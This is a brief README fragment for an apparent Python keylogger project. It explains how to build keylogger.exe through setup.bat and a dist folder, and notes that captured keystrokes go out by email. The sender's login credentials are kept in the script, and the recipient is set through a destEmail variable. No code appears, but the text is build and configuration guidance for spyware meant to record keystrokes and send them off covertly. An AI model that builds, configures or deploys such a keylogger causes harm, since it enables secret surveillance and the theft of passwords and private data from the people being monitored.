Yunchao/Python-Keylogger/README.md

 2. Run **setup.bat**.
 3. Navigate to the newly created **dist** folder.
 If the setup was successful then **keylogger.exe** should be there.

+The current email target is the sender.
+Its login information is located in the python script.
+The destination can be changed via the destEmail variable.